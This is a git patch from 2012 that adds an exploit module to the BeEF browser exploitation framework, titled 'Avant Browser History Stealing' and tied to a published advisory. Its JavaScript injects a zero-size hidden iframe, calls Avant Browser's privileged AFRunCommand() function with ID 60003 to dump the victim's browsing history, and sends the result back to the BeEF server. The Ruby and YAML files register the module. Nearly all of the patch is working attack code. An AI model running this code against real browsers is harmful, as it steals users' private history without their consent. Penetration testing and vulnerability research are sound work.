From 9546e881134119ae3d6413d59fa378ed2f6f455a Mon Sep 17 00:00:00 2001
From: Roberto Suggi Liverani <robertosl81@gmail.com>
Date: Wed, 28 Nov 2012 14:11:04 +1300
Subject: [PATCH] Avant Browser History Stealing

Avant Browser History Stealing module - Advisory:
http://blog.malerisch.net/2012/11/avant-browser-same-of-origin-policy.html
---
 .../exploits/avant_steal_history/command.js   | 51 +++++++++++++++++++
 .../exploits/avant_steal_history/config.yaml  | 25 +++++++++
 .../exploits/avant_steal_history/module.rb    | 33 ++++++++++++
 3 files changed, 109 insertions(+)
 create mode 100644 modules/exploits/avant_steal_history/command.js
 create mode 100644 modules/exploits/avant_steal_history/config.yaml
 create mode 100644 modules/exploits/avant_steal_history/module.rb

diff --git a/modules/exploits/avant_steal_history/command.js b/modules/exploits/avant_steal_history/command.js
new file mode 100644
index 000000000..6eb89b905
--- /dev/null
+++ b/modules/exploits/avant_steal_history/command.js
@@ -0,0 +1,51 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+
+	
+
+	var avant_iframe = document.createElement("iframe");
+	//var avant_iframe = beef.dom.createInvisibleIframe();
+	avant_iframe.setAttribute('src', "browser:home");
+	avant_iframe.setAttribute('name','test2');
+	avant_iframe.setAttribute('width','0');
+	avant_iframe.setAttribute('heigth','0');
+	avant_iframe.setAttribute('scrolling','no');
+
+	document.body.appendChild(avant_iframe);
+
+	var vstr = {value: ""};
+
+	if(window['test2'].navigator) {
+	//This works if FF is the rendering engine
+	window['test2'].navigator.AFRunCommand(<%= @cId %>, vstr);
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, vstr.value);
+
+	}
+	else {
+	// this works if Chrome is the rendering engine
+	//window['test2'].AFRunCommand(60003, vstr);
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "Exploit failed. Rendering engine is not set to Firefox");	
+
+	}
+	
+
+	
+
+	
+
+});
+
diff --git a/modules/exploits/avant_steal_history/config.yaml b/modules/exploits/avant_steal_history/config.yaml
new file mode 100644
index 000000000..1121f0db2
--- /dev/null
+++ b/modules/exploits/avant_steal_history/config.yaml
@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        avant_steal_history:
+            enable: true
+            category: ["Exploits", "XSS"]
+            name: "Avant Browser History Stealing"
+            description: "Invoke AFRunCommand() privileged function. The integer 60003 is passed by default to dump the Avant Browser history."
+            authors: ["Roberto Suggi Liverani"]
+            target:
+                working: ["ALL"]
diff --git a/modules/exploits/avant_steal_history/module.rb b/modules/exploits/avant_steal_history/module.rb
new file mode 100644
index 000000000..7a819fa5e
--- /dev/null
+++ b/modules/exploits/avant_steal_history/module.rb
@@ -0,0 +1,33 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Avant_steal_history < BeEF::Core::Command
+
+	def self.options
+
+		configuration = BeEF::Core::Configuration.instance
+		
+
+		return [
+			{'name' => 'cId', 'ui_label' => 'Command ID:', 'value' => '60003', 'type' => 'textarea', 'width' => '400px', 'height' => '25px' }
+		]
+
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end